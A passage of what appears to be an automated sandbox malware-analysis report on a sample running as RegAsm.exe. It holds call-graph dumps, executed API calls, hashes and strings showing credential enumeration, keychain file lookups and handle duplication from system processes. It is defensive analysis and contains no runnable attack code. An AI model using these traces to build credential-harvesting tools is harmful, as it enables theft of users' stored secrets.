41f44f 40276->40283 40278 41f466 40277->40278 40362 41c635 memset memset 40277->40362 40278->40243 40278->40246 40283->40278 40285 41f50b 40283->40285 40333 41f1a5 40283->40333 40358 41c06f memcmp 40283->40358 40359 41f3b1 89 API calls 40283->40359 40360 41f398 85 API calls 40283->40360 40285->40277 40285->40278 40361 41c295 85 API calls 40285->40361 40363 41703f 40287->40363 40289 437399 40290 43739d 40289->40290 40292 4373ac 40289->40292 40370 4446ea 11 API calls 40290->40370 40293 416935 16 API calls 40292->40293 40294 4373ca 40293->40294 40296 438460 133 API calls 40294->40296 40300 4251c4 136 API calls 40294->40300 40304 415a91 memset 40294->40304 40307 43758f 40294->40307 40319 437584 40294->40319 40322 437d3c 134 API calls 40294->40322 40371 425433 13 API calls 40294->40371 40372 425413 17 API calls 40294->40372 40373 42533e 16 API calls 40294->40373 40374 42538f 16 API calls 40294->40374 40375 42453e 122 API calls 40294->40375 40295 4375bc 40298 415c7d 16 API calls 40295->40298 40296->40294 40299 4375d2 40298->40299 40301 4442e6 11 API calls 40299->40301 40321 4373a7 40299->40321 40300->40294 40302 4375e2 40301->40302 40302->40321 40378 444283 13 API calls 40302->40378 40304->40294 40376 42453e 122 API calls 40307->40376 40308 4375f4 40313 437620 40308->40313 40314 43760b 40308->40314 40312 43759f 40315 416935 16 API calls 40312->40315 40317 416935 16 API calls 40313->40317 40379 444283 13 API calls 40314->40379 40315->40319 40317->40321 40319->40295 40377 42453e 122 API calls 40319->40377 40320 437612 memcpy 40320->40321 40321->40255 40322->40294 40323->40239 40324->40258 40325->40256 40326->40258 40327->40239 40328->40264 40329->40274 40330->40270 40331->40264 40332->40264 40334 41bc3b 100 API calls 40333->40334 40335 41f1b4 40334->40335 40336 41edad 85 API calls 40335->40336 40343 41f282 40335->40343 40337 41f1cb 40336->40337 40338 41f1f5 memcmp 40337->40338 40339 41f20e 40337->40339 40337->40343 40338->40339 40340 41f21b memcmp 40339->40340 40339->40343 40341 41f326 40340->40341 40344 41f23d 40340->40344 40342 41ee6b 85 API calls 40341->40342 40341->40343 40342->40343 40343->40283 40344->40341 40345 41f28e memcmp 40344->40345 40347 41c8df 55 API calls 40344->40347 40345->40341 40346 41f2a9 40345->40346 40346->40341 40349 41f308 40346->40349 40350 41f2d8 40346->40350 40348 41f269 40347->40348 40348->40341 40351 41f287 40348->40351 40352 41f27a 40348->40352 40349->40341 40356 4446ce 11 API calls 40349->40356 40353 41ee6b 85 API calls 40350->40353 40351->40345 40354 41ee6b 85 API calls 40352->40354 40355 41f2e0 40353->40355 40354->40343 40357 41b1ca memset 40355->40357 40356->40341 40357->40343 40358->40283 40359->40283 40360->40283 40361->40277 40362->40278 40364 417044 40363->40364 40365 41705c 40363->40365 40367 416760 11 API calls 40364->40367 40369 417055 40364->40369 40366 417075 40365->40366 40368 41707a 11 API calls 40365->40368 40366->40289 40367->40369 40368->40364 40369->40289 40370->40321 40371->40294 40372->40294 40373->40294 40374->40294 40375->40294 40376->40312 40377->40295 40378->40308 40379->40320 40383 42b4ff 40380->40383 40381 415a91 memset 40382 42b52c 40381->40382 40384 42b553 memcpy 40382->40384 40385 42b545 40382->40385 40383->40381 40384->40385 40385->40207 40386->40209 40387->40211 40393 415cfe 40388->40393 40397 415d23 __aullrem __aulldvrm 40393->40397 40400 41628e 40393->40400 40394 4163ca 40407 416422 11 API calls 40394->40407 40396 416172 memset 40396->40397 40397->40394 40397->40396 40398 416422 10 API calls 40397->40398 40399 415cb9 10 API calls 40397->40399 40397->40400 40398->40397 40399->40397 40401 416520 40400->40401 40402 416527 40401->40402 40406 416574 40401->40406 40404 416544 40402->40404 40402->40406 40408 4156aa 11 API calls 40402->40408 40405 416561 memcpy 40404->40405 40404->40406 40405->40406 40406->40186 40407->40400 40408->40404 40430 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37702 425711 37680->37702 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37702 37745 415c56 11 API calls 37699->37745 37701 429a96 37700->37701 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37701->37748 37702->37681 37702->37689 37702->37694 37702->37697 37703 4260a1 37702->37703 37712 4259c2 37702->37712 37715 425a38 37702->37715 37732 4227f0 memset memcpy 37702->37732 37733 422b84 15 API calls 37702->37733 37734 422b5d memset memcpy memcpy 37702->37734 37735 422640 13 API calls 37702->37735 37737 4241fc 11 API calls 37702->37737 37738 42413a 89 API calls 37702->37738 37741 415c56 11 API calls 37703->37741 37710 429a7a 37746 416760 11 API calls 37710->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37702 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37702 37733->37702 37734->37702 37735->37702 37736->37689 37737->37702 37738->37702 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37702 37745->37710 37746->37701 37747->37701 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37840 41bf99 85 API calls 37781->37840 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37805 418c63 37785->37805 37819 4446ce 11 API calls 37786->37819 37789 41be69 37789->37769 37789->37779 37790 41bee7 37790->37789 37823 41a453 85 API calls 37790->37823 37792->37789 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37822 4446ce 11 API calls 37793->37822 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37820 418a6d memset memcpy memset 37797->37820 37798->37789 37809 41ac13 37799->37809 37821 41a223 memset memcpy memset 37800->37821 37804 41bf20 37804->37798 37808 418c72 37805->37808 37806 418d51 memset memset 37807 418c94 37806->37807 37807->37792 37808->37806 37808->37807 37810 41ac52 37809->37810 37811 41ac3f memset 37809->37811 37814 41ac6a 37810->37814 37824 41dc14 19 API calls 37810->37824 37812 41acd9 37811->37812 37812->37790 37815 41aca1 37814->37815 37825 41519d 37814->37825 37815->37812 37817 41acc0 memset 37815->37817 37818 41accd memcpy 37815->37818 37817->37812 37818->37812 37819->37789 37820->37800 37821->37804 37822->37790 37824->37814 37828 4175ed 37825->37828 37836 417570 SetFilePointer 37828->37836 37831 41760a ReadFile 37833 417637 37831->37833 37834 417627 GetLastError 37831->37834 37832 4151b3 37832->37815 37833->37832 37835 41763e memset 37833->37835 37834->37832 37835->37832 37837 4175b2 37836->37837 37838 41759c GetLastError 37836->37838 37837->37831 37837->37832 37838->37837 37839 4175a8 GetLastError 37838->37839 37839->37837 37840->37782 37841 417bc5 37842 417c61 37841->37842 37843 417bda 37841->37843 37843->37842 37844 417bf6 UnmapViewOfFile CloseHandle 37843->37844 37846 417c2c 37843->37846 37848 4175b7 37843->37848 37844->37843 37844->37844 37846->37843 37853 41851e 18 API calls 37846->37853 37849 4175d6 CloseHandle 37848->37849 37850 4175c8 37849->37850 37851 4175df 37849->37851 37850->37851 37852 4175ce Sleep 37850->37852 37851->37843 37852->37849 37853->37846 39866 4147f3 39869 414561 39866->39869 39868 414813 39870 41456d 39869->39870 39871 41457f GetPrivateProfileIntW 39869->39871 39874 4143f1 memset _itow WritePrivateProfileStringW 39870->39874 39871->39868 39873 41457a 39873->39868 39874->39873

                                                                Executed Functions

                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                APIs
                                                                • memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                • memset.MSVCRT ref: 0040DF5F
                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                • API String ID: 708747863-3398334509
                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                • free.MSVCRT ref: 00418803
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                • String ID:
                                                                • API String ID: 1355100292-0
                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFind$FirstNext
                                                                • String ID:
                                                                • API String ID: 1690352074-0
                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0041898C
                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: InfoSystemmemset
                                                                • String ID:
                                                                • API String ID: 3558857096-0
                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                APIs
                                                                • memset.MSVCRT ref: 004455C2
                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 0044570D
                                                                • memset.MSVCRT ref: 00445725
                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                • memset.MSVCRT ref: 0044573D
                                                                • memset.MSVCRT ref: 00445755
                                                                • memset.MSVCRT ref: 004458CB
                                                                • memset.MSVCRT ref: 004458E3
                                                                • memset.MSVCRT ref: 0044596E
                                                                • memset.MSVCRT ref: 00445A10
                                                                • memset.MSVCRT ref: 00445A28
                                                                • memset.MSVCRT ref: 00445AC6
                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                • memset.MSVCRT ref: 00445B52
                                                                • memset.MSVCRT ref: 00445B6A
                                                                • memset.MSVCRT ref: 00445C9B
                                                                • memset.MSVCRT ref: 00445CB3
                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                • memset.MSVCRT ref: 00445B82
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                • memset.MSVCRT ref: 00445986
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                • API String ID: 2263259095-3798722523
                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                • String ID: $/deleteregkey$/savelangfile
                                                                • API String ID: 2744995895-28296030
                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                • memset.MSVCRT ref: 0040B756
                                                                • memset.MSVCRT ref: 0040B7F5
                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
